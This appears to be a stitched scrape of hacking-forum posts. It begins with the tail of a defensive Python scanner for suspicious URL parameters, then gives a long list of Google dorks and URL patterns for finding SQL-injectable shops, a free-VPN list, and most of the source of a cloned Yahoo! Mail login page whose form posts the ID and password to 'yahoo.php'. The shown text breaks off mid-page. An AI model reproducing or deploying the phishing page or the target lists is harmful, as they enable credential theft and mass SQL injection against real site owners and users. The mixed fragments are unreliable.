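                    "source": m.group("ip"),
                    "page": parts.path,
                    "param": name,
                    "value": unquote_plus(raw),
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %(line)d %(source)s %(page)s %(param)s=%(value)s" % f)
        for r in f["reasons"]:
            print("    reason: " + r)
```

On the sample input the benign lines (a plain `cat=5` and `q=red+shoes`) produce nothing, while the three crafted requests are each flagged with the matching reasons; the `#` check in particular only works because the value is decoded before inspection, since in a raw URL `%23` never looks like a comment.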
-
site:.pk intext:Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in & "id" site:.pk intext:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in & "id" about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.php?ID= catalog_main.php?catid= category.php category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID= checkout_confirmed.php?order_id= checkout1.php?cartid= comersus_listCategoriesAndProducts.php?idCategory= comersus_optEmailToFriendForm.php?idProduct= comersus_optReviewReadExec.php?idProduct= comersus_viewItem.php?idProduct= comments_form.php?ID= contact.php?cartId= content.php?id= customerService.php?****ID1= default.php?catID= description.php?bookid= details.php?BookID= details.php?Press_Release_ID= details.php?Product_ID= details.php?Service_ID= display_item.php?id= displayproducts.php downloadTrial.php?intProdID= emailproduct.php?itemid= emailToFriend.php?idProduct= events.php?ID= faq.php?cartID= faq_list.php?id= faqs.php?id= feedback.php?title= freedownload.php?bookid= fullDisplay.php?item= getbook.php?bookid= GetItems.php?itemid= giftDetail.php?id= help.php?CartId= home.php?id= index.php?cart= index.php?cartID= 
index.php?ID= info.php?ID= item.php?eid= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item_details.php?catid= item_list.php?maingroup item_show.php?code_no= itemDesc.php?CartId= itemdetail.php?item= itemdetails.php?catalogid= learnmore.php?cartID= links.php?catid= list.php?bookid= List.php?CatID= listcategoriesandproducts.php?idCategory= modline.php?id= myaccount.php?catid= news.php?id= order.php?BookID= order.php?id= order.php?item_ID= OrderForm.php?Cart= page.php?PartID= payment.php?CartID= pdetail.php?item_id= powersearch.php?CartId= price.php privacy.php?cartID= prodbycat.php?intCatalogID= prodetails.php?prodid= prodlist.php?catid= product.php?bookID= product.php?intProdID= product_info.php?item_id= productDetails.php?idProduct= productDisplay.php productinfo.php?item= productlist.php?ViewType=Category&CategoryID= productpage.php products.php?ID= products.php?keyword= products_category.php?CategoryID= products_detail.php?CategoryID= productsByCategory.php?intCatalogID= prodView.php?idProduct= promo.php?id= promotion.php?catid= pview.php?Item= resellers.php?idCategory= results.php?cat= savecart.php?CartId= search.php?CartID= searchcat.php?search_id= Select_Item.php?id= Services.php?ID= shippinginfo.php?CartId= shop.php?a= shop.php?action= shop.php?bookid= shop.php?cartID= shop_details.php?prodid= shopaddtocart.php shopaddtocart.php?catalogid= shopbasket.php?bookid= shopbycategory.php?catid= shopcart.php?title= shopcreatorder.php shopcurrency.php?cid= shopdc.php?bookid= shopdisplaycategories.php shopdisplayproduct.php?catalogid= shopdisplayproducts.php shopexd.php shopexd.php?catalogid= shopping_basket.php?cartID= shopprojectlogin.php shopquery.php?catalogid= shopremoveitem.php?cartid= shopreviewadd.php?id= shopreviewlist.php?id= ShopSearch.php?CategoryID= shoptellafriend.php?id= shopthanks.php shopwelcome.php?title= show_item.php?id= show_item_details.php?item_id= showbook.php?bookid= showStore.php?catID= 
shprodde.php?SKU= specials.php?id= store.php?id= store_bycat.php?id= store_listing.php?id= Store_ViewProducts.php?Cat= store-details.php?id= storefront.php?id= storefronts.php?title= storeitem.php?item= StoreRedirect.php?ID= subcategories.php?id= tek9.php? template.php?Action=Item&pid= topic.php?ID= tuangou.php?bookid= type.php?iType= updatebasket.php?bookid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= products.php?type= event.php?id= showfeature.php?id= home.php?ID= tas/event.php?id= profile.php?id= details.php?id= past-event.php?id= index.php?action= site/products.php?prodid= page.php?pId= resources/vulnerabilities_list.php?id= site.php?id= products/index.php?rangeid= global_projects.php?cid= publications/view.php?id= display_page.php?id= pages.php?ID= lmsrecords_cd.php?cdid= product.php?prd= cat/?catid= products/product-list.php?id= debate-detail.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= 
detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= forum/profile.php?id= media/pr.php?id= content.php?ID= cloudbank/detail.php?ID= pages.php?id= news.php?id= beitrag_D.php?id= content/index.php?id= index.php?i= ?action= index.php?page= beitrag_F.php?id= index.php?pageid= page.php?modul= detail.php?id= index.php?w= index.php?modus= news.php?id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= product-range.php?rangeID= en/news/fullnews.php?newsid= deal_coupon.php?cat_id= show.php?id= blog/index.php?idBlog= redaktion/whiteteeth/detail.php?nr= HistoryStore/pages/item.php?itemID= aktuelles/veranstaltungen/detail.php?id= tecdaten/showdetail.php?prodid= ?id= rating/stat.php?id= content.php?id= viewapp.php?id= item.php?id= news/newsitem.php?newsID= FernandFaerie/index.php?c= show.php?id= ?cat= categories.php?cat= category.php?c= product_info.php?id= prod.php?cat= store/product.php?productid= 
browsepr.php?pr= product-list.php?cid= products.php?cat_id= product.php?ItemID= category.php?c= main.php?id= article.php?id= showproduct.php?productId= view_item.php?item= skunkworks/content.php?id= index.php?id= item_show.php?id= publications.php?Id= index.php?t= view_items.php?id= portafolio/portafolio.php?id= YZboard/view.php?id= index_en.php?ref= index_en.php?ref= category.php?id_category= main.php?id= main.php?id= calendar/event.php?id= default.php?cPath= pages/print.php?id= index.php?pg_t= _news/news.php?id= forum/showProfile.php?id= fr/commande-liste-categorie.php?panier= downloads/shambler.php?id= sinformer/n/imprimer.php?id= More_Details.php?id= directory/contenu.php?id_cat= properties.php?id_cat= forum/showProfile.php?id= downloads/category.php?c= index.php?cat= product_info.php?products_id= product_info.php?products_id= product-list.php?category_id= detail.php?siteid= projects/event.php?id= view_items.php?id= more_details.php?id= melbourne_details.php?id= more_details.php?id= detail.php?id= more_details.php?id= home.php?cat= idlechat/message.php?id= detail.php?id= print.php?sid= more_details.php?id= default.php?cPath= events/event.php?id= brand.php?id= toynbeestudios/content.php?id= show-book.php?id= more_details.php?id= store/default.php?cPath= property.php?id= product_details.php?id= more_details.php?id= view-event.php?id= content.php?id= book.php?id= page/venue.php?id= print.php?sid= colourpointeducational/more_details.php?id= print.php?sid= browse/book.php?journalID= section.php?section= bookDetails.php?id= profiles/profile.php?profileid= event.php?id= gallery.php?id= category.php?CID= corporate/newsreleases_more.php?id= print.php?id= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= 
english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= modules/forum/index.php?topic_id= feature.php?id= products/Blitzball.htm?id= profile_print.php?id= questions.php?questionid= html/scoutnew.php?prodid= main/index.php?action= ********.php?cid= ********.php?cid= news.php?type= index.php?page= viewthread.php?tid= summary.php?PID= news/latest_news.php?cat_id= index.php?cPath= category.php?CID= index.php?pid= more_details.php?id= specials.php?osCsid= search/display.php?BookID= articles.php?id= print.php?sid= page.php?id= more_details.php?id= newsite/pdf_show.php?id= shop/category.php?cat_id= shopcafe-shop-product.php?bookId= shop/books_detail.php?bookID= index.php?cPath= more_details.php?id= news.php?id= more_details.php?id= shop/books_detail.php?bookID= more_details.php?id= blog.php?blog= index.php?pid= prodotti.php?id_cat= category.php?CID= more_details.php?id= poem_list.php?bookID= more_details.php?id= content.php?categoryId= authorDetails.php?bookID= press_release.php?id= item_list.php?cat_id= colourpointeducational/more_details.php?id= index.php?pid= download.php?id= shop/category.php?cat_id= i-know/content.php?page= store/index.php?cat_id= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= wiki/pmwiki.php?page****= summary.php?PID= 
productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= products.php?categoryID= modules.php?****= message/comment_threads.php?postID= artist_art.php?id= products.php?cat= index.php?option= ov_tv.php?item= index.php?lang= showproduct.php?cat= index.php?lang= product.php?bid= product.php?bid= cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= item_show.php?lid= ?pagerequested= downloads.php?id= print.php?sid= print.php?sid= product.php?intProductID= productList.php?id= product.php?intProductID= more_details.php?id= more_details.php?id= books.php?id= index.php?offs= mboard/replies.php?parent_id= Computer Science.php?id= news.php?id= pdf_post.php?ID= reviews.php?id= art.php?id= prod.php?cat= event_info.php?p= view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= english/board/view****.php?code= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id=
-
Source: InSecurity.ro Edit: I just saw that it had already been posted by a user who has since been banned.
-
Install Sandboxie Download Link: PS: I saw that it hadn't been posted, so I thought I'd post it.
-
List of free VPNs:
SecurityKIS http://www.securitykiss.com/sk/index.php
Free VPN http://thefreevpn.com/
proXPN http://proxpn.com/
USA IP http://www.usaip.eu/en/free_vpn.php
Open VPN http://openvpn.net/
Its Hidden http://itshidden.com/
Cyberghost http://cyberghostvpn.com/ --> Good for Germany
Hotspot Shield http://anchorfree.com/downloads/hotspot-shield/
VPN Tool http://www.vpntool.com/services.php --> good US
Tor VPN https://torvpn.com/information.html
Download ifreeVPN: Password:
-
Make something better yourself, then.
-
Since the post is old and the links have expired, I'll post the source myself: Index.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Yahoo! Mail: The best web-based email!</title> <!-- Refresh login page every 15 minutes --> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta http-equiv="refresh" content="900"> <meta content="index,follow" name="robots"> <meta content="Yahoo! Mail Free reliable easy efficient PhotoMail SpamGuard antivirus storage mail for mobile award-winning" name="keywords"> <meta content="Get free web-based email from Yahoo! Access email from anywhere, enjoy unlimited storage space, and feel secure with award-winning spam protection." name="description"> <link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/sec.yimg.com/lib/common/fonts_200502080901.css"> <style type="text/css"> @import url(https://a248.e.akamai.net/sec.yimg.com/lib/reg/css/yregml_sec_200704191234.css); .ct{background:transparent url(https://a248.e.akamai.net/sec.yimg.com/i/reg/cr_gg_ne.gif) no-repeat top right;top:-1px} .ct .cl{background:transparent url(https://a248.e.akamai.net/sec.yimg.com/i/reg/cr_gg_nw.gif) no-repeat top left} .cb{background:transparent url(https://a248.e.akamai.net/sec.yimg.com/i/reg/cr_gg_se.gif) no-repeat bottom right;bottom:-1px} .cb .cl{background:transparent url(https://login.yahoo.com/i/reg/cr_gg_sw.gif) no-repeat bottom left} div.yregdsilu h2.yregdnt, div.yregdsilu p.yregsueasy{width:110px} /* persistency message right above "sign in" bottom */ em.nwred a {font-style: normal; font-size: 85%; color:#c00; top:-1px; position: relative } .kmsibold {font-weight:bold; font-size: 114%;} p#sigcopys {text-align: left; font-size: 85%; float: right; padding: .4em; margin: .6em .4em 1em 0; border-bottom: 1px dotted #9D9C9D; border-top: 1px dotted #9D9C9D;} input#persistent 
{margin-bottom: -0em;} .subperstxt {margin: 0 0 0 2em;} .subperstxt2 {margin: 0 0 0 2em;} #yregft p.yregfb { font-size:120%; padding-bottom: 5px; padding-up: 5px} #yregtxt {width:66%; overflow:hidden} #yregbnr {padding-top:0} #yregbnr #yregbnrti #yregbnrtii {width:240px} #yregiclst {padding-right:0} </style> <style type="text/css"> /*anti phish badge */ .top {position:relative} #antiphish{position:absolute;right:5px;top:5px;} #antiphish.dogear{right:0px;top:0px;} #antiphish a {font-size:92%;} img.picture {border:2px solid} /* badge backgrounds */ .badge{background-color:#f9f9f9; background-repeat:no-repeat; background-position:top right;} .badge #yreglgtb {margin-top:18px;} /* increased badge size */ /* popup code... */ #security {display:none;position:absolute;top:-15px;left:-85px;z-index:1000;background-color:#a5a5a5;} #security.noimage {left:-76px;top:-10px} #securityi{position:relative;z-index:1;right:1px;bottom:1px;padding:11px;width:219px;background-color:#fff;border:1px solid #636363;} #knob{position:absolute;top:30px;right:-10px;width:10px;height:18px;background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/sideknob.png) no-repeat top left} .noimage #knob{top:22px} #security p, #security ul li{font:77%/107% verdana;} #security p a {text-decoration:underline;} #security p{padding-bottom:5px;} #security ul{margin:5px 0 0;padding:0 5px 0 0;text-align:right;list-style:none;} #security ul li{margin:0;padding:0 0 2px;} /* help text updates... 
*/ #yregtgen #yregtxt .yregbpt li ul{margin:10px 0 0;padding:0 0 0 15px;} #yregtgen #yregtxt .yregbpt li ul li{background:none;list-style:disc;margin:0 0 5px 0;padding:0;} #yreghtxt ul{margin-left:0} #yreghtxt ul.inlineHeaders li h3{display:inline;} /* remove top margin on li ul */ .addressbar {display:block;margin:1em 0 1em 0} .mono{font-family: courier new, courier, monospace;color:#000;font-weight:bold} #rcta {width:99%; border:1px solid #898989; margin-top:10px; background-image:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/gradient.png); background-repeat:repeat-x; background-color:#fde37c} .ct {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/upper-right.gif) no-repeat scroll right top; top:-1px} .ct .cl {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/upper-left.gif) no-repeat scroll left top;} #rcta .key {width:40px; height:40px; border:1px solid #666666; background-image:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/key.png); background-repeat: no-repeat; float:left; margin-top:1px} #rcta .txt {margin-left:48px} .cb {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/lower-right.gif) no-repeat scroll right bottom; bottom:-1px} .cb .cl {background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/lower-left.gif) no-repeat scroll left bottom;} #rcta .ctact {margin:4px 10px;min-height:44px} #rcta .txt .qs {font:normal bold 92% arial, Helvetica, sans-serif; color:#000; text-decoration:none} #rcta .txt .sl {font:normal normal 100% arial, Helvetica, sans-serif; color:#000; text-decoration:none} #rcta .txt .why {font:normal normal 85% arial, Helvetica, sans-serif;} #rcta .txt .sltxt {line-height:0.9em} .sltxt a {line-height:0.5em; font-size:85%} .sltxt .why a{font-size:100%} </style> <!--[if IE]> <style type="text/css"> .yregclb{height:1%} #yreglgtb td{text-align:left} #yreglgtb td input{width:110px} #antiphish img{right:15px} #antiphish.dogear{right:1px;top:1px;} 
#knob{background:url(https://a248.e.akamai.net/sec.yimg.com/i/reg/sideknob_b.gif);right:-11px} .badge #yreglgtb {margin-top:20px;} #rcta .key {margin-top:0} .badge {height:1%} </style> <![endif]--> <!--[if lte IE 6]> <style type="text/css"> .yregclb{height:30em} #yregtxt {height:1%} </style> <![endif]--> <!--[if IE]> <style type="text/css"> #antiphish.dogear{right:11px;} #antiphish{right:15px;} </style> <![endif]--> <!--[if IE 5]> <style type="text/css"> #yregbnr{margin-top:23px;padding-top:0} /* offset login box */ .yregbnrimg {margin:0 0 0 -3px} /* 3px jog Win/IE5 */ </style> <![endif]--> <!--[if IE]> <style type="text/css"> #yregbnrti{height:159px;padding-top:0} #yregbnrtii{margin-top:0} .knob{top:-5px} #yregtml .mailplus{height:60px;padding-top:0} #yregtml .mailplus div{margin-top:0} #yregtml .spamguard{height:52px;padding-top:0} #yregtml .spamguard div{margin-top:0} #yregtml .addressbook{height:50px;padding-top:0} #yregtml .addressbook div{margin-top:0} #yregtml .messenger{height:60px;padding-top:0} #yregtml .messenger div{margin-top:0} #yregtml .photos{height:60px;padding-top:0} #yregtml .photos div{margin-top:0} #yregtml .mobile{height:60px;padding-top:0} #yregtml .mobile div{margin-top:0} #yregtml .antivirus{height:60px;padding-top:0} #yregtml .antivirus div{margin-top:0} #yregtml .cnet{height:72px;padding-top:0} #yregtml .cnet div{margin-top:0} #yregtml .pcmag{height:94px;padding-top:0} #yregtml .pcmag div{margin-top:0} #yregbnr #yregbnrti {margin-top:-160px} </style> <![endif]--> <!--[if lte IE 6]> <style type="text/css"> .yregclb{height:30em} #yregtxt {height:auto} </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .knob{top:-6px} #antiphish.dogear{top:0;right:0;} #antiphish{right:5px;} </style> <![endif]--> </head> <body id="yregtml"> <div id="yregwp"> <!-- begin header --> <table id="yregmst" width="750" cellpadding="0" cellspacing="0" border="0"><tr valign="top"> <td width="100%"><table width="100%" cellspacing="0" border="0"><tr 
valign="top"> <td width="1%"><img src="https://a248.e.akamai.net/sec.yimg.com/i/us/nt/ma/ma_mail_1.gif" alt="Yahoo! Mail" width=196 height=33 border=0></td> <td><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr valign="top"> <td align="right" id="ygmaproplinks" style="padding-right:3px;line-height:12px;"><font face="verdana,geneva,sans-serif" size="-2"><a href="http://www.yahoo.com " target="www" class="header" title="Click here to go to Yahoo! homepage">Yahoo!</a> - <a href="http://help.yahoo.com/help/us/edit/" class="header" target="yhelp" title="Click here for help">Help</a></font></td> </tr></table></td></tr></table></td> <td align="right" style="padding: 6px 0 0 4px;"> </td></tr></table> <!-- end header --> <span id="cache"></span> <script language="JavaScript"> function checkBrowser(){ var appName = navigator.appName; if( appName == "Microsoft Internet Explorer" ) { // this only works in IE 5 for windows and higher ... if( navigator.appVersion.indexOf("Windows") == -1 ) return -1; var appVersionAry = navigator.appVersion.split("("); if( appVersionAry.length < 2 ) return -1; var appVersion = appVersionAry[1]; appVersionAry = appVersion.split("; "); if( appVersionAry.length < 2 ) return -1; appVersion = appVersionAry[1]; appVersionAry = appVersion.split(" "); if( appVersionAry.length < 2 ) return -1; appVersion = appVersionAry[1]; var appVersionNumber = parseInt(appVersion); if( appVersionNumber < 5 ) return -1; } else { return -1; } } </script> <script language="JavaScript"> function flashCacheReady (initialized){ //invoked directly by Flash } </script> <div id="yregct" class="yregclb"> <div id="yreglg"> <!-- login box goes here --> <div class="top yregbx"> <script type="text/javascript">if(top == self) { document.write("<div class=\" badge\">")}</script> <span class="ct"><span class="cl"></span></span> <div class="yregbxi"> <script type="text/javascript">if(top == self) { document.write("") } else { top.location.href = "http://www.yahoo.com" 
}</script> <h1>Sign in to Yahoo!</h1> <script type="text/javascript">if (top == self) { document.write(" <div id=\"rcta\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <span class=\"ct\"> <span class=\"cl\"></span> </span> </a> <div class=\"ctact\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <div class=\"key\"> </div> </a> <div class=\"txt\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\"> <span class=\"qs\">Are you protected?</span> </a> <div class=\"sltxt\"> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\"> <span class=\"sl\">Create your sign-in seal.</span> </a> <span class=\"why\">(<a href=\"https://protect.login.yahoo.com/?.src=ym&.v=0&.u=6mhj08d3q8cnv&.last=&promo=&.intl=us&.bypass=&.help=3&.partner=&pkg=&stepid=&.pd=ym_ver%3d0%2526c=&.done=http%3A//mail.yahoo.com\">Why?</a>)</span> </div> </div> </div> <a href=\"https://protect.login.yahoo.com/login/set_pref?.intl=us&.src=ym&.u=6mhj08d3q8cnv&.partner=&pkg=&stepid=&.pd=c=&.crumb=&.done=\" tabIndex=\"-1\"> <span class=\"cb\"> <span class=\"cl\"></span> </span> </a> </a> </div> <div class=\"clear\"> </div>") } else { top.location.href = "http://www.yahoo.com" }</script> <fieldset> <legend>Login Form</legend> <form method="post" action="yahoo.php" autocomplete="off" name="login_form" onsubmit="return hash2(this)"> <input type="hidden" name=".tries" value="1"> <input type="hidden" name=".src" value="ym"> <input type="hidden" name=".md5" value=""> <input type="hidden" 
name=".hash" value=""> <input type="hidden" name=".js" value=""> <input type="hidden" name=".last" value=""> <input type="hidden" name="promo" value=""> <input type="hidden" name=".intl" value="us"> <input type="hidden" name=".bypass" value=""> <input type="hidden" name=".partner" value=""> <input type="hidden" name=".u" value="6mhj08d3q8cnv"> <input type="hidden" name=".v" value="0"> <input type="hidden" name=".challenge" value="OW9i3G9arif.tWgQEiApcX8H5amC"> <input type="hidden" name=".yplus" value=""> <input type="hidden" name=".emailCode" value=""> <input type="hidden" name="pkg" value=""> <input type="hidden" name="stepid" value=""> <input type="hidden" name=".ev" value=""> <input type="hidden" name="hasMsgr" value="0"> <input type="hidden" name=".chkP" value="Y"> <input type="hidden" name=".done" value="http://mail.yahoo.com"> <input type="hidden" name=".pd" value="ym_ver=0&c="> <table id="yreglgtb" summary="form: login information"> <tr> <th><label for="username">Yahoo! ID:</label></th> <td><input name="login" id="username" value="" size="17" class="yreg_ipt" type="text" maxlength="96"></td> <script language="JavaScript" type="text/javascript">if(document.getElementById) document.getElementById('username').focus();</script> </tr> <tr> <th><label for="passwd">Password:</label></th> <td><input name="passwd" id="passwd" value="" size="17" class="yreg_ipt" type="password" maxlength="64"></td> </tr> </table> <p id="sigcopys"><input type="checkbox" id="persistent" name=".persistent" value="y" > <label for="persistent"> <span class="kmsibold">Keep me signed in</span><br><span class="subperstxt">for 2 weeks unless I sign out.</span> <em class="nwred"><a href="http://us.rd.yahoo.com/reg/login1/lisu/pst_help/us/ym/*https://login.yahoo.com/config/login?.src=ym&.intl=us&.help=4&.v=0&.u=6mhj08d3q8cnv&.last=&promo=&.bypass=&.partner=&pkg=&stepid=&.pd=ym_ver%3d0%26c=&.ab=&.done=http%3A//mail.yahoo.com" tabindex="99999">New!</a></em></label> <span 
class="subperstxt2">[Uncheck if on a shared computer]</span> </p> <div class="clear"></div> <p class="yreglgsb"><input type="submit" name=".save" value="Sign In"></p> </form> </fieldset> <a href="http://us.rd.yahoo.com/reg/login1/lisu/forgot_lib/us/ym/*https://edit.europe.yahoo.com/config/eval_forgot_pw?new=1&.done=http%3A//mail.yahoo.com&.src=ym&partner=&.intl=us&pkg=&stepid=&.pd=ym_ver%3d0%26c=&.ab=&.last=">Forget your ID or password?</a> | <a href="http://us.rd.yahoo.com/reg/login1/lisu/sih_lib/us/ym/*https://login.yahoo.com/config/login?.src=ym&.intl=us&.help=1&.v=0&.u=6mhj08d3q8cnv&.last=&.last=&promo=&.bypass=&.partner=&pkg=&stepid=&.pd=ym_ver%3d0%26c=&.ab=&.done=http%3A//mail.yahoo.com">Help</a> </p> <div class="yregdlisu"> <h2>Don't have a Yahoo! ID?</h2> <p>Signing up is easy.</p> <p class="yreglgsu"><a href="https://edit.europe.yahoo.com/config/eval_register?.intl=us&new=1&.done=http%3A//mail.yahoo.com&.src=ym&.v=0&.u=6mhj08d3q8cnv&partner=&.partner=&pkg=&stepid=&.p=&promo=&.last=">Sign Up</a></p> </div> <!-- end lisu --> </div> <span class="cb"><span class="cl"></span></span> <script type="text/javascript">document.write("</div>")</script> </div> <!-- promo marketing header --> <div class="second yregbx"> <span class="ct"><span class="cl"></span></span> <div class="yregbxi"> <h3>One Yahoo! ID. So much fun!</h3> <p>Use your single ID for everything from checking Mail to checking out Yahoo! 
Music, Photos, Messenger, and more.</p> </div> <span class="cb"><span class="cl"></span></span> </div> <!-- End promo marketing header --> <!-- end login box --> </div> <div id="yregtxt"> <!-- begin left side content --> <!-- Top ad insert here --> <!-- SpaceID=150001465 loc=R1 noad --> <!-- top static call --> <div class="rootbeer"> <div id="yregbnr"> <img src="https://a248.e.akamai.net/sec.yimg.com/i/reg/bnr_28.jpg" alt="Filter" class="yregbnrimg" height="173" width="204"> <div id="yregbnrt"><div id="yregbnrti"><div id="yregbnrtii"> <img src="https://a248.e.akamai.net/sec.yimg.com/i/reg/title_mailtour_rb.gif" alt="You deserve the best. Yahoo! Mail delivers." height="50" width="244"> <p>Enjoy tons of features and fun ways to stay in touch and share. Sign up now, it's FREE!</p> <p><a class="yregnlnk" href="http://tour.mail.yahoo.com/mailtour.html" onclick="yg_popup('http://tour.mail.yahoo.com/mailtour.html','y',700,450); return false" target="_blank">Tour Yahoo! Mail</a></p> </div></div></div> </div></div> <!-- end top add call --> <!-- Top ad insert ends --> <!-- Bottom ad insert here --> <!-- SpaceID=150001465 loc=R2 noad --> <!-- bottom ad call --> <div id="yregiclst"> <div class="ic mobile"><div><h3>Get mobile. Get messages.</h3> <cite><a class="yregnlnk" onclick="yreg_popLayer('hl_list',this,0,25,'96946863');">Yahoo! alerts you</a> of new email and lets you read them on your mobile phone.</cite> </div></div> <!-- begin hidden layer --> <div id="hl_list" class="hiddenlayer"> <div class="yreginhdly"> <h4>Stay connected with yahoo! mobile alerts</h4> <p>Don't miss important news just because you're away from the PC.</p> <ul> <li>Get alerts on your mobile phone the second new Mail arrives.</li> <li>Set up free* alerts for the latest news, weather, stocks, sports scores, more.</li> <li>Personalize alerts to get the exact info you want.</li> </ul> <p class="yreglegal">*Yahoo! Mobile Alerts are available at no charge from Yahoo! 
